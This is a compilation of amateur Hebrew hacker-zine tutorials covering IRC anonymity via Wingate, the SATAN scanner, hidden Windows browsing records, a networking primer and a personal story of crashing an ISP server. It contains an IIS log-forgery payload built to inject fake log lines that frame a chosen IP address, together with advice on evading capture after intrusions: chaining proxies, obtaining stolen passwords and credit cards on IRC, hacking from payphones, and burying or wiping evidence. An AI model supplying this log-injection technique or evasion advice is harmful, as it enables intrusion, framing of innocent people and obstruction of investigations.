‫אנונימיות ב ‪IRC‬‬
‫שיטה מספר ‪ :1‬דרך ‪:Wingate‬‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫והולכים ל‬
‫‪File‬‬
‫‪Option‬‬
‫‪Firewall‬‬
‫שמה תבחרו ‪Use Socks firewall‬‬
‫ולהכניס שרת ‪ Wingate‬בפורט ‪1080‬‬
‫*‪/‬אני לא יודע עם השיטה הזאת עובדת רק שמעתי שהיא טובה!‪*/‬‬
‫שיטה מיספר ‪ :2‬שיטה נוספת דרך ‪:Wingate‬‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫כאשר אתה ב ‪ offline‬תכניס את הפקודה‪:‬‬
‫‪/server wingate-ip:[port 23] ie /server xxx.xxx.xxx(IP Address) 23‬‬
‫עכשיו אתה מחובר ל ‪.........wingate‬‬

‫רק צריך להיתחבר לשרת מירק‪...‬ותעשה‪:‬‬
‫‪/quote irc.server.com 6667‬‬
‫לפני שתקבל פינג תכניס את הפקודה‪:‬‬
‫‪/quote user god bikkel snikkel urnick‬‬
‫‪/quote nick urnick‬‬
‫שיטה מיספר ‪:3‬‬
‫~~~~~~~~~~~~~‬
‫תשים את הפקודה הזאת במירק‪:‬‬
‫‪/mode yournick +x‬‬
‫תוכנית "שטן"‬
‫תוכנית ‪ :Satan‬נכתב ע"י ‪.Crossbow‬‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫היום זה היום שישנה את החיים שלכם‪ .‬היום אתם תחשפו לראשונה לאחת הדרכים‬
‫שבה ההאקרים האמיתיים משתמשים‪ .‬היום תלמדו על ‪ .Satan‬דבר ראשון‪Satan ,‬‬
‫זה‬
‫לא איזה תוכנה מהגהנום‪ ,‬אלא תוכנית שמטרתה לזהות חורים באבטחה‪ Satan .‬זה‬
‫‪ ,Security Administrators Tool for Analyzing Networks‬או בעברית‪ ,‬כלי‬
‫למנהלי אבטחה לניתוח רשתות‪ .‬תוכנה זו משמשת לסריקת מחשבים ברשת כדי‬
‫לגלות‬
‫נקודות תורפה מסויימות‪ .‬התוכנה הזאת מבצעת את אותם הדברים שאותם מבצעים‬
‫האקרים כדי לפצח מערכות‪ ,‬אלא שבמקום לנצל את נקודת התורפה של המערכת‪,‬‬
‫היא‬
‫רק מדווחת על החור אבטחה‪ Satan .‬מדווחת על פגמים בשרתים עבור‬
‫הפרוטוקולים‬
‫‪ Ftp, Finger, Nis, Nfs, Rexd‬ועוד‪ .‬בדרך כלל הפגם הוא בסך הכל קובץ‬
‫תצורה‬
‫שנבנה בצורה גרועה‪ ,‬אבל לפעמים הפגם הוא חור אבטחה או באג‪ .‬ביחד עם‬
‫‪Satan‬‬
‫באים גם דפי הדרכה שמסבירים בדיוק על סוגי נקודות התורפה שניתן לנצל‪,‬‬
‫וגם‬
‫איך ניתן לתקן אותן‪ .‬פה זאת הבחירה שלכם‪ .‬אני בטוח שכשהתחלתם עם האקינג‪,‬‬
‫רובכם חשבתם לעצמכם "אז נראה כמה טריקים לחברים שלי ונלך"‪ .‬אז זהו‪ ,‬שלא‪.‬‬
‫זה כבר לא משחק‪ .‬זה האקינג אמיתי ומסוכן‪ ,‬שיכולים לתפוס אתכם‪ .‬אז תיקחו‬
‫חמש דקות‪ ,‬ותחשבו טוב טוב על איזה האקרים אתם רוצים להיות‪ .‬אתם יכולים‬
‫להיות האקרים מניאקים )שחורים( שפורצים למערכת ודופקים לה ת'צורה‪ .‬אתם‬
‫גם‬
‫יכולים להיות האקרים טובים )לבנים( שמגלים באג במערכת‪ ,‬ומתקנים אותו או‬
‫מודיעים עליו לאדמין‪ .‬אני ממליץ על האפשרות השנייה‪ ,‬כי זה נותן שם טוב‬
‫להאקינג‪ ,‬זה מראה שאנחנו לא מתלהבים מעצמנו יותר מדי‪ .‬אחרי שהחלטתם מה‬
‫תעשו בתור האקרים‪ ,‬אתם יכולים להמשיך‪.‬‬
‫אזהרות לתוכנה‬
‫=============‬
‫‪ Satan‬נבנתה בשפות ‪ Perl 5.0‬ושפת ‪ .C‬אל תיקחו מאף אחד את התוכנה‬
‫היישומית‬
‫כי כל אחד יכול להשתיל בה וירוס‪ .‬תורידו את הקוד מקור ותקמפלו בעצמכם‪.‬‬
‫התוכנית היא תחת רשיון ‪ ,Gnu‬יעני‪ ,‬אתם יכולים לעשות בקוד מקור הכל‪ ,‬כל‬
‫עוד אתם לא משתמשים בו למיסחור )יעני‪ ,‬לעשות כסף(‪ .‬יש כמה מערכות ברחבי‬
‫הרשת שכוללות אזהרות נגד פולשים והפעלה של ‪ Satan‬ברשת עלולה להפעיל את‬
‫האזעקות האלו‪ ,‬אז תיזהרו‪.‬‬
‫להוריד את זה‬
‫============‬
‫טוב‪ ,‬הכי טוב זה להוריד מאפטיפי אנונימי‪ ,‬שכתובתו היא‪:‬‬
‫‪ftp.win.tue.nl/pub/security‬‬
‫טוב‪ ,‬תיזהרו עם זה‪ ,‬ועוד עצה אחרונה‪ :‬תסתכלו בקוד המקור של התוכנה‪ ,‬הוא‬
‫אומר המון!!! שלכם‪,‬‬
‫קרוסבוו‬
‫קבצים חבויים‬
‫חלק ‪ -‬א'‬ ‫הקבצים החבויים של מיקרוסופט!‬
‫‪----------------------------‬‬
‫הקדמה קצרה‬
‫‪-----------‬‬
‫היי חבר'ה ברוכים הבאים למדריך הראשון בסדרה שלי על הקבצים החבויים של‬
‫מיקרוסופט‪.‬‬
‫נתחיל בזה שאני לא מדבר על הקבצים החבויים הרגילים של מיקרוסופט‬
‫אלה שבמאפיינים שלהם רשום שהם חבויים )‪ (Hidden‬אני לא מדבר על ה ‪+h‬‬
‫הרגילים!‬
‫אני מדבר על הקבצים הבלתי נראים לגמרי שלא קיימים בשום מקום ואי אפשר‬
‫לראות אותם!‬
‫)גם אם תעשו באופציות של התיקייה שיראה את כל הקבצים כולל החבויים לא‬
‫תראו אותם‪.(...‬‬
‫אז למי איכפת ולמה זה בכלל מעניין אותנו? הא‪ ..‬הא‪? ..‬‬
‫‪-----------------------------------------------------‬‬
‫אוקיי שאלה טובה )ארוכה אבל טובה ‪!(:‬‬
‫אתם לא תאמינו בכלל למה שאני עומד לספר לכם אז תשבו ותחזיקו חזק!‬
‫כולם יודעים שאין פרטיות בוונידוס ושמיקרוסופט מסריחים!‬
‫אבל מה שלא ידעתם זה באיזה סדר גודל זה!!!‬
‫וזה תפקידי לספר לכם וזה תפקידינו בכלל בהאקרז‪-‬זון לספר לכם‬
‫את כל הדברים שלא ידעתם ואת כל הדברים שלא רצו שתדעו!‬
‫אוקיי עכשיו אחרי כל המשפטים שנגמרים בסימני קריאה אפשר להגיע לאקשן)!(‬
‫מה שמכילים הקבצים האלה או התיקיות האלה )כן יש גם תיקייה שלמה‬
‫מוסתרת‪ (...‬זה‪:‬‬
‫כל אתרי האינטרנט שגלשתם בהם אי פעם!!!‬
‫ועוד כל מיני פרטים עליכם‪...‬‬
‫עכשיו‪ ...‬אם מישהו יבנה טרוג'ן‬
‫)אני לא יודע בדיוק מה המילה לזה בעברית‪ ...‬טרוייני? מטריין? טרויין?(‬
‫שיקרא וינתח את כל הקבצים החבויים הוא יוכל לבנות עליכם פרופיל שלם!‬
‫כולל מספר האתרים שבקרתם בהם כולל כתובתם כולל שמות משתמש בחלק מהאתרים‬
‫כולל מה חיפשתם במנועי חיפשו ועוד המון דברים!‬
‫\* הערה‪ :‬אולי צוות האקרז ‪ -‬זון יפתח כזה טרוג'ן *‪/‬‬
‫בכל אופן אותי זה עצבן נורא‪...‬‬
‫ואני בטוח שזה מעצבן גם את רוב הקוראים של המדריך הזה!‬
‫אני לא מבין למה! אין סיבה בכלל שמיקרוסופט יעשו דבר כזה!‬
‫אין שום סיבה שבעולם! זה לא לטובתנו זה בטוח‪...‬‬
‫וזה גם לא נראה לי עוזר להם באיזה שהיא דרך!‬
‫וואי! איך מוצאים אותם ומה עושים עם זה?‬

‫‪---------------------------------------‬‬
‫שוב שאלה טובה! )אמרו לי פעם שאני קצת אגו‪-‬מניאק וסכיזופרן ‪(:‬‬
‫אין לאף אחד סיכוי למצוא אותם אלא אם הוא יודע שהם קיימים!‬
‫למה? בגלל שלא רואים אותם בווינדוס )באקספלורר( ולא רואים אותם בדוס‬
‫כשמבקשים את‬
‫רשימת הקבצים )‪.(DIR‬‬
‫עוד בעייה היא שגם כשאתם מבקשים מאינטרנט‬
‫אקספלורר למחוק אותם הם לא נמחקים‪...‬‬
‫הדרך היחידה לגשת אליהם היא לדעת שהם שם‪...‬‬
‫מה הכוונה? הכוונה היא שצריך לכתוב את המקום המדוייק שלהם‪.‬‬
‫המיקום המדוייק שלהם הוא ב‪:‬‬
‫‪c:\windows\tempor~1\content.ie5‬‬
‫‪c:\windows\history\history.ie5‬‬
‫והקבצים הכי חשובים הם ‪index.dat‬‬
‫מיקרוסופט מנעו גם מהחיפוש שלהם לחפש בתיקיות האלו כדי שלא ימצאו אותם!‬
‫עכשיו אם אתם רוצים לראות את זה בווינדוס יש שיטה‬
‫כתבו בדוס‪:‬‬
‫‪\c:\windows\explorer /e,c:\windows\tempor~1\content.ie5‬‬
‫והנה נפתחה לכם תיקייה עם כל האתרים שהייתם בהם!‬
‫‪---------------------------------------------------------------------‬‬
‫‪-‬‬
‫אני מת מעייפות ואני חולה אז אני יפסיק פה ובמדריך הבא אני ילמד אותכם‬
‫עוד דברים שלא‬
‫ידעתם על הווינדוס שלכם! כולל איך למחוק את הקבצים האלה!‬
‫‪---------------------------------------------------------------------‬‬
‫‪-‬‬
‫קבצים חבויים חלק ב'‬

‫חלק ‪ -‬ב'‬ ‫הקבצים החבויים של מיקרוסופט!‬
‫‪----------------------------‬‬
‫שוב שלום! במדריך הקודם הפסקנו במצב שבו ראיתם את מה שהווינדוס אסף‬
‫עליכם‪...‬‬
‫בחלק הזה של המדריך אני יראה לכם עוד כמה דברים‬
‫ואיך לנקות את הדברים שכתובים עליכם ופוגעים בפרטיותכם‪.‬‬
‫אוקיי אז לעבודה!‬
‫מה עוד ווינדוס שומר עליי?‬

‫‪-------------------------‬‬
‫לא תאמינו אבל ווינדוס שומר את כל האימיילים שקיבלתם‬
‫ואת כל האימיילים ששלחתם!!!‬
‫כולם!!!‬
‫הסיומת שלהם היא ‪ .dbx‬תעשו חיפוש ותמצאו אותם הם בדרך כלל בתיקייה‬
‫‪c:\windows\application data\identities‬‬
‫ושם יש תיקיות עם מספרים כאלה מוזרים‬
‫)זה סוג של קידוד מסויים שווינדוס משתמש בו(‬
‫בפנים יש קבצים‪:‬‬
‫‪inbox.dbx‬‬
‫‪offline.dbx‬‬
‫‪draft.dbx‬‬
‫‪sent item.dbx‬‬
‫וכו'‪...‬‬
‫מה זה הסיומות האלה?‬

‫‪-------------------‬‬
‫הסיומות האלה הן סיומות של דאטאבייס מיוחד‬
‫של אווטלוק‪...‬‬
‫אפשר לקרוא אותם בוורדפד‪...‬‬
‫מה עוד?‬
‫‪-------‬‬
‫ווינדוס גם שומר ברג'יסטרי את האתרים האחרונים שבקרתם בהם!‬
‫האתרים האחרונים שבקרתם בהם נמצאים ב‪:‬‬
‫‪HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs‬‬
‫‪HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs‬‬
‫וואי וואי‪ ...‬מה עושים?‬

‫‪----------------------‬‬
‫זה בחירה שלכם‪...‬‬
‫אתם רוצים לשמור את זה? למחוק את זה?‬
‫בכל אופן אם אתם רוצים למחוק את זה תעקבו אחרי השלבים‪:‬‬
‫לכו לדוס ותעשו כך‪:‬‬

‫‪) C:\WINDOWS\SMARTDRV‬מאיץ את הדברים(‬
‫‪\CD‬‬
‫‪) DELTREE/Y TEMP‬מעיף את התקייה של הטמפוררי הזמנית(‬
‫‪CD WINDOWS‬‬
‫‪) DELTREE/Y COOKIES‬מעיף את תיקיית העוגיות(‬
‫‪) DELTREE/Y HISTORY‬מעיף את תיקיית ההיסטורי ששם שמורים כל הדפים שגלשתם‬
‫בהם אי פעם(‬
‫‪) DELTREE/Y TEMPOR~1‬מוחק את הקש והדפים הזמניים של האינטרנט(‬
‫המלצה לסיום‪:‬‬
‫‪------------‬‬
‫תעיפו את ווינדוס לכל הרוחות וגם את כל המוצרים של מיקרוסופט!‬
‫אני יודע שזה מה שאני הולך לעשות!‬
‫אני מתקין לינוקס ובחיים לא חוזר לווינדוס ולאקספלורר!!!‬
‫בכל אופן מה שתבחרו אני מקווה שתשמרו לעצמכם על הפרטיות תמיד!‬
‫מקווה שעזרתי‪...‬‬
‫!!!‪MICROSOFT SUCKS‬‬
‫רשתות‬
‫מה במדריך?‬
‫הגדרה של רשת‪ ,‬יתרונות וחסרונות‪.‬‬ ‫א'‪-‬‬ ‫חלק‬

‫סוגי רשתות‪.‬‬ ‫ב'‪-‬‬ ‫חלק‬
‫פרוטוקול‪.‬‬ ‫ג'‪-‬‬ ‫חלק‬
‫סוגי פרוטוקולים נפוצים‪.‬‬ ‫ד'‪-‬‬ ‫חלק‬
‫‪-----------------------------------------------------------------‬‬
‫חלק א'‪-‬הגדרה של רשת‪ ,‬יתרונות וחסרונות‪.‬‬

‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬
‫רשת זה בעצם דבר מאוד בסיסי‪ ,‬רשת זה שני מחשבים מחוברים‬

‫אחד אל השני על מנת לשתף תוכנות‪ ,‬מדפסת‪ ,‬קבצים וכדומה‪.‬‬
‫יתרונות‪:‬‬
‫א‪ .‬חיסכון בעלויות ‪ -‬דוגמא‪ :‬ארבעה מחשבים מחוברים ברשת‪,‬‬

‫כל המחשבים מדפיסים אל מדפסת אחת‪,‬‬
‫חיסכון של ‪ 3‬מדפסות‪ ,‬בערך ‪ 2000‬ש"ח‪.‬‬
‫ב‪ .‬יעילות בעבודה ‪ -‬דוגמא‪ :‬שני מחשבים מחוברים ברשת‪,‬‬

‫שניהם יכולים לשתף ביניהם קבצים‪,‬‬
‫גם אם הם במרחק גדול אחד מן השני‪.‬‬
‫חסרונות‪:‬‬
‫א‪ .‬חדירת וירוס ‪ -‬ברגע שוירוס פגע במחשב אחד‪ ,‬כל שאר המחשבים‬
‫נפגעים ‪ ,‬ברוב המקרים‪ ,‬באותו וירוס‪.‬‬
‫ב‪ .‬פריצה ‪ -‬נגיד ששני מחשבים מחוברים ברשת‪ ,‬במרחק ‪ 40‬מטר‬

‫אחד מהשני‪ ,‬כל אחד בחדר אחר‪ ,‬ברגע שמישהו נכנס‬
‫אל מחשב אחד‪ ,‬הוא יכול לראות מה יש במחשב השני‪.‬‬
‫חלק ב'‪-‬סוגי רשתות‪.‬‬

‫^^^^^^^^^^^^^^^^^^‬
‫יש שני סוגי רשתות‪:‬‬
‫ˆ שרת לקוח )‪(Client-Server‬‬

‫ˆ רשת שיוויונית )‪(Peer To Peer‬‬
‫מאובטח יותר ‪ -‬שרת לקוח‬

‫‪ -‬רשת שיוויונית‪.‬‬ ‫זול יותר‬
‫)עוד יתרונות וחסרונות של סוגי הרשתות במדריך הבא(‬
‫חלק ג'‪ -‬פרוטוקול‪.‬‬

‫^^^^^^^^^^^^^^^^^‬
‫התקשורת בין שני מחשבים נעשה בשפת פרוטוקול‪.‬‬
‫בכדי להגדיר רשת חייבים להגדיר פרוטוקול‪ ,‬לכל רשת יש‬

‫את הפרוטוקול שלה‪ .‬יש רשתות שיודעות לעבוד עם יותר‬
‫מפרוטוקול אחד‪.‬‬
‫חלק ד'‪ -‬סוגי פרוטוקולים נפוצים‪.‬‬

‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬
‫ˆ ‪ - TCP/IP‬הפרוטוקול הנפוץ ביותר ונמצא בשימוש האינטרנט‪.‬‬
‫כמו כן משמש את הרשתות שמבוססות על תוכנות מיקרוסופט‪.‬‬
‫ˆ ‪ - IPX/SPX‬פרוטוקול הנמצא בשימוש ברשתות מבוססות נובל בלבד!‬
‫ˆ ‪ - NETBIUE‬פרוטוקול המשמש לזיהוי ותקשורת ברמה מקומית בלבד‪.‬‬
‫אז‪ ,‬זהו! כאן נגמר המדריך לרשתות חלק א'‪ ,‬אני לא ממש בטוח מה‬
‫יהיה במדריך הבא‪ ,‬אני בעצמי עוד לומד על הנושא‪ ,‬לפי דעתי בפרק‬
‫הבא אני כבר יסביר לכם על בניית רשת והגדרת רשת‪ ,‬אם לא אז תחכו‬
‫לחלק השלישי ;(‪.‬‬
‫מי שרוצה הסברים יותר מפורטים על הפרוטוקולים ועל שאר‬

‫הדברים במדריך יכול ליצור איתי קשר‬
‫באייסיקיו‪147607610 :‬‬
‫או באימייל‪Neo_Guns@walla.co.il :‬‬
‫זיוף לוגים‬
‫‪iis‬זיוף לוגים ב‬
‫____________‬
‫למה זה טוב לי‬

‫‪+++++++++++‬‬
‫טוב מעבר לפרוקסים זאת עוד דרך להיות מאובטח במהלך פריצה‪...‬‬
‫כי בעצם איך מנהל האתר יכול לדעת עליך את כל הפרטים איי פי וכו' הסיבה‬
‫לכך‬
‫היא שכל הפרטים מאוחסנים בקבצי לוג‬
‫)‪(log.‬‬
‫אז כל פעם שהאתר נפרץ מנהל האתר יכול ללכת לתיקיה של הלוגים ולבדוק איזה‬
‫איי פי היה‬
‫באתר בזמן הפריצה וע"פ מפסר האיי פי לדעת מאיזה ארץ‪ ,‬עיר‪ ,‬מיקוד אתה‬
‫מגיע ועוד המון פרטים‬
‫לכן זה אפילו יותר טוב מפרוקסים‬
‫מערכות פגיעות‬
‫‪++++++++++++++‬‬
‫כל שרתי ה‬
‫‪iis‬‬
‫עד לגירסה הלפני אחרונה של השרת‬
‫)‪(iis 5.1‬‬
‫זאת אומרת כל הגירסות עד‬
‫‪iis 5.1‬‬
‫תקציר‬
‫‪++++++++++++‬‬
‫בעיית אבטחה שמאפשרת לתוקפי השרת לזייף את הלוגים‬
‫שמגיעים לשרת הבעייה נוצרת עקב תחליפי הקס‬
‫)‪(xx, where xx is an HEX code%‬‬
‫בצורתם המקורית בקבצי הלוג‬
‫"‪"%0A‬‬
‫מתחלף בשורה חדשה ההתקפה אפקטיבית על שרתי איי איי אס בהדרגות המקוריות!‬
‫פרטים‬
‫‪+++++++++‬‬
‫בפרטי הלוג שבקבצי הלוג יש קוד הקס שמתורגם לאותיות לדוגמה‬
‫‪index%2e.asp/‬‬
‫מתורגם ל‬
‫‪index.asp/‬‬
‫כאשר ההקס מתווסף לקובץ הלוג‪ .‬הבעיה מעלה את העובדה ש‬
‫‪%0a‬‬
‫מתורגם לשורה חדשה ו‬
‫‪ff%‬‬
‫נראה כמו רווח‬
‫בעזרת שני אלה תוכל בקלות ליצור קובץ לוג שנראה אמיתי!!!‬
‫דוגמה‬
‫‪+++++++‬‬
‫‪index.asp%FF200%FFHTTP/1.1%0A00:52:11%FF198.116.142.34%FFGET/‬‬
‫‪%FF/evilplaces‬‬
‫הנה קריאה ל‬
‫‪index.asp‬‬
‫שמסתיימת ב‬
‫‪notice 200‬‬
‫ו‬
‫‪HTTP/1.1‬‬
‫מראה את הגירסה של ה‬
‫‪http‬‬
‫אז מגיעה שורה חדשה‬
‫‪%0a‬‬
‫עקב העובדה שכל הלוגים נעשים ע"פ זמן גריניצ כל מה שהתוקף צריך לעשות זה‬
‫לגלות מה השעה בלונדון והם מסיימים! בעקבות זה מגיע האיי פי שאתה רוצה‬
‫'למסגר' ואז כל‬
‫שאר הפרטים שאתם חושבים שתצטרכו‪.‬‬
‫‪ ff%‬ו‬
‫‪%0a‬‬
‫יעבדו ב‬
‫‪edit‬‬
‫של דוס)הנווטפאד של פעם( מכיוון שסביר שמנהל האתר ישתמש ב‬
‫‪notepad‬‬
‫יש לשנות את ה‬
‫‪ff%‬‬
‫ל‬
‫‪%09‬‬
‫אלו פרמטרים שהם לא חובה בלוגים‬

‫‪(Time (time -‬‬
‫‪(Client IP Address (c-ip -‬‬
‫‪(Method (cs-method -‬‬
‫‪(URI Stem (cs-uri-stem -‬‬
‫‪(Protocol Status (cs-status -‬‬
‫‪(Protocol Version (cs-version -‬‬
‫אנונימיות‬
‫מה הטקסט בא להגיד??‬
‫‪-----------------------‬‬
‫הטקסט אנונימיות בא להגיד לכם שאתם צריכים להיזהר ולהיות פולנים!!!!!!‬
‫לדאוג לכל דבר קטן לא ידעתי שזה דבר כל כך חשוב עד שזה קרה לחבר שלי‬
‫גם בסרט "‪ "hackers‬קורה משהו דומה שתופסים מישהו! ‪..‬‬
‫מה קורה שתופסים אותך?‬

‫‪---------------------‬‬
‫אתם לא תבינו את החשיבות של הדבר עד שיתפסו אותכם‪..‬‬
‫כשאתם פורצים לאנשהו לבזק למשל אחרי כמה זמן ‪ ..‬נציג של בזק מתקשר אליכם‬
‫אתם *בשיתוק* אתם לא יכולים לזוז לא יודעים מה לעשות מקבלים קנס אדיר על‬
‫כאלה‬
‫דברים ויכולים להכניס אותכם לכלא לעבריינים צעירים‪(: ..‬‬
‫זה נושא מאוד רגיש לכן תקשיבו טוב טוב ‪ ..‬תפנימו ‪ ..‬ותזכרו!‬
‫איך לא להיתפס?‬
‫‪--------------‬‬
‫טוב זה תלוי בפעולה שאתם עושים פורצים לבנק ? וכאלה דברים‬
‫אבל תזכרו לא סתם פורצים לאנשהו ומסתכלים בתיקיות זה לא צחוק‬
‫אל תעשו את זה סתם ‪ ..‬טוב בואו נמשיך‬
‫לפני כן אתם חייבים קודם כל להשיג מאנשים סיסמאות של אחרים‬
‫יש מלא משוגעים בדאל נט באי אר סי שיתנו לכם כרטיסי אשראי‬
‫סיסמאות של אנשים שם משתמש ועוד‪..‬‬
‫אחרי שהתחברתם על חשבון של מישהו אחר זה דבר אחד‬
‫לדבר השני קוראים פרוקסי ‪..‬‬
‫מה זה בעצם ? פרוקסי עובד על פרוטוקול‪ ...‬הפרוקסי נוצר‬
‫בשביל להאיץ לכם את האינטרנט )בקושי הוא מאיץ‪ (..‬ולקצר את כל המסלול‬
‫שלכם‪..‬‬
‫ה ‪ route‬אבל זה לא חשוב כרגע‪ ...‬אולי אני יעשה מתישהו טקסט על פרוקסי‬
‫טוב בואו נמשיך ‪ ...‬איך משתמשים ומתקינים את הפרוקסי ?‬
‫הנה רשימה של סרברים של פרוקסי ‪:‬‬
‫‪cache1.dsldesigns.com:1080‬‬
‫‪nt.onninen.ee:8080‬‬
‫‪i.am.the.god.of.ircnet.pl:8080‬‬
‫‪proxy-wi.dataway.ch:8080‬‬
‫‪bess3.proxy.lacoe.edu:8080‬‬
‫‪proxy.iprolink.ch:8080‬‬
‫‪prox2.mediaserv.net:8080‬‬
‫‪magica.ntb.no:8080‬‬
‫‪DSL-2-149.isd.net:1080‬‬
‫ליד כל פרוקסי רשום את הפורט שלו‪..‬‬
‫עכשיו איך מתקינים את הפרוקסי? טוב נגיד בחרתם ב ‪:‬‬
‫‪magica.ntb.no:8080‬‬
‫אז נכנסים לאקספלורר שלכם לוחצים על תפריט ה ‪tools‬‬
‫בוחרים ב ‪internet options‬‬
‫בוחרים בפרופיל ה ‪conections‬‬
‫לוחצים על ‪lan settings‬‬
‫מסמנים ב ‪ v‬את ‪use a proxy server‬‬
‫וממלאים את השאלות‬
‫אחרי שבחרתם לכם פרוקסי ותפרצו לאנשהו אז בזק יקבלו את האי פי של‬
‫הפרוקסי )אי פי = הת"ז של המחשב שלכם(‬
‫ואז בזק יבקשו את הלוגים של הסרבר יכול להיות שהסרבר במקום אחר ולא בארץ‬
‫אז הם יצטרכו לטוס לשם ‪(:‬‬
‫ועד שהם יקבלו את הלוגים זה כבר ימחק‪...‬‬
‫אז יש דרך להתחבר דרך פרוקסי שמתחבר דרך פרוקסי שמתחבר דרך פרוקסי ואז‬
‫אם אתם פורצים לבזק‪..‬‬
‫בזק יעשו מסע מסביב לעולם ב ‪ 80‬יום ‪ (:‬אז תתחברו דרך המון פרוקסי ואיך‬
‫עושים את זה רושמים ככה ‪:‬‬
‫‪DSL-2-149.isd.net:1080-_-magica.ntb.no:8080-_-‬‬
‫‪prox2.mediaserv.net:8080‬‬
‫כרגע התחברתי דרך שלושה פרוקסים אפשר יותר‪(: ..‬‬
‫טוב זו דרך אחת שלא יגלו אותכם ‪..‬‬
‫)צריך לעשות את כל הדרכים( אפשר בהמון תוכנות להתחבר דרך פרוקסי גם באי‬
‫סי קיו‪...‬‬
‫תתחברו דרך כל מקום שאתם יכולים אחר כך בקשר לתוכנות האקינג לדיסקים‬
‫צרובים\פרוצים‬
‫לכל טקסט או משהו שקשור להאקינג או פריקינג או לא חוקי שימו בדיסקים לא‬
‫במחשב‬
‫כי אם תופסים אותכם אתם יכולים לרוץ לחצר שלכם או משהו ולחפור בור ולשים‬
‫את הדיסקים או משהו ‪..‬‬
‫אחר כך אם אתם נכנסים לפורומים או רושמים לעצמכם אתר באיזשהו שרת או כל‬
‫דבר אחר שמבקש מידע‬
‫באינרנט אל תתנו את המידע שלכם ‪ ..‬תמיד תהיו אנונימים אבל למרות זאת‬
‫שאתם פורצים לאנשהו אז תקראו את הטקסט‬
‫של הפריקינג מהגיליון הראשון ותתחברו דרך טלפון ציבורי או דרך בית של‬
‫מישהו אף פעם אל תפרצו לאנשהו דרך הבית שלכם‬
‫אחרת יתפסו אותכם על בטוח ואל תדברו עם חברים שלכם לא בפלאפון לא בטלפון‬
‫על האקינג פריקינג כאלה דברים‬
‫אל תדבר עם אף אחד גם לא באינטרנט אולי באי סי קיו וכאלה מקומות אבל רק‬
‫אם אתם סומכים על הבנאדם ב ‪100%‬‬
‫אחר כך יש את התוכנות חפשו בכל האינרנט תוכנות שמבלבלות אנשים ושלא‬
‫ייתנו לחברות גדולות לאתר אותכם‬
‫יש מלא תוכנות שגם מזייפות אי פי וכאלה תמצאו כמה שיותר ‪....‬‬
‫ואם אתם פורצים דרך מישהו אחר אז תפרצו דרך מקום שהוא לא קרוב לבית‪..‬‬
‫אם תופסים אותי????‬

‫‪------------------------‬‬
‫כל הדברים שקשורים להאקינג פריקינג במחשב ומחוצה לו תחפרו בור באדמה‬
‫תחביאו או שתשימו במקום שאף אחד לא יימצא‬
‫אבל אף פעם לא‬
‫בבית!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!‬
‫!!!!!!!!!!!!!!!!!!!!!!‬
‫אם נציג של חברה מתקשר אליכם אל תבהלו תקחו בקלות ותדברו רגיל תמחקו את‬
‫כל ההיסטורי שלכם בדפדפן‬
‫וההיסטורי באי סי קיו ‪ ...‬תמחקו מקומות שהייתם בהם ומלא דברים שיכולים‬
‫לשמש נגדכם‪..‬‬
‫טוב זהו עד לפעם הבאה שלכם ‪:‬‬

‫‪kixl0r‬‬
‫הערות ‪,‬הארות תגובות ועוד יש לשלוח ל‪:‬‬
‫‪kixlor@hotmail.com‬‬
‫טוב זה כל הטקסט בקשר לאנונימיות‬

‫למה חשוב להשאר אנונימי‬
‫למה חשוב להשאר אנונימיים!!!‬
‫_____________________‬
‫הערה‪ :‬טקסט זה הוא למתחילים ומתקדמים כשאחד!‬
‫ממש חושב לקרוא את זה!!!!‬
‫אוקיי הנה אני קול אבדול האקר שוויצר שבטוח שהוא הכי טוב בעולם משוכנע‬
‫שבחיים לא יתפסו אותו!‬
‫אבל אז קרא לי משהו ששינה לי את כל הגישה להאקינג‬
‫מאז שהייתי מתלמד לקחתי האקינג באיזי אמרתי מה כבר יכול לקרות???‬
‫עכשיו אחרי שפעם ראשונה תפסו אותי פתאום הבנתי שמה שאני עושה זה‬
‫ח ו ק י ! ! ! !‬ ‫ל א‬
‫תמיד ידעתי שאני עובר על החוק המושג הזה אף פעם לא באמת השתרש בי!!!!‬
‫תמיד אמרתי יאללה מה כבר הם יעשו!‬
‫אבל עכשיו אני יודע האקינג זה לא משחק ‪ ...‬תעצרו שניה ותחשבו איך באמת‬
‫אתם מיתייחסים להאקינג כי אתם מיד תראו שאתם לא לוקחים את זה כל כך‬
‫ברצינות לפחות רובכם!‬
‫אז תקשיבו לסיפור שלי‪:‬‬
‫אני כותב לי טקסט אל‬
‫‪adsl‬‬
‫בבזק ובו זמנית מנסה דברים חדשים על הסרבר שלהם!‬
‫אחרי כל מיני דברים שעשיתי פתאום אני קולט הסרבר נתקע ואני מנותק!!!‬
‫אני אפילו לא התכוונתי לעשות שום דבר רק ללמוד איך הכל שם פועל‬
‫ובטעות‪....‬‬
‫פתאום אני מקבל טלפון משרות‬
‫‪adsl‬‬
‫בבזק!‬
‫מיד ניתקתי את הטלפון והתקשרתי לחבר שלי שגם לו יש‬
‫‪adsl‬‬
‫שאלתי אותו אם הוא מחובר הוא אמר שהוא התנתק ושהוא לא מצליח להתחבר!!!‬
‫חטפתי התקף לב וישר התקשרתי לעוד חבר שלי וגם הוא אמר לי שהוא לא מצליח‬
‫להתחבר‬
‫ברגע הזה עלו לי דמעות לעיניים‪...‬כמעט בכיתי‬
‫כי הבנתי שאני הפלתי את הסרבר של ה‬
‫‪ADSL‬‬
‫באותו רגע מישהו מצלצל לי בדלת אחרי היסוסים רבים עם‬
‫‪kixl0r‬‬
‫באיי סי קיו ומחיקת רוב ההארד דיסק שלי בגלל שהוא מכיל מלא חומר על‬
‫האקינג‬
‫הלכתי לדלת וראיתי שזה השכן שבא להחזיר לנו גופיה שנפלה לנו מהחבל כביסה‬
‫אבל‪...‬‬
‫אבל אני לא נרגעתי כי ידעתי שהם עוד יגיעו!‬
‫לידיעתכם העונש על כזה דבר יכול להסתכם בקנס עצום‬
‫של מילוני דולרים‪ ...‬אסירה על שימוש במחשב עם אינטרנט ו ‪ 10‬שנים בכלא!!!‬
‫אז‪ ...‬אני עוד מחכה לסוף המר שיגיע בקרוב!!! ואם עדיין תהיה לי גישה‬
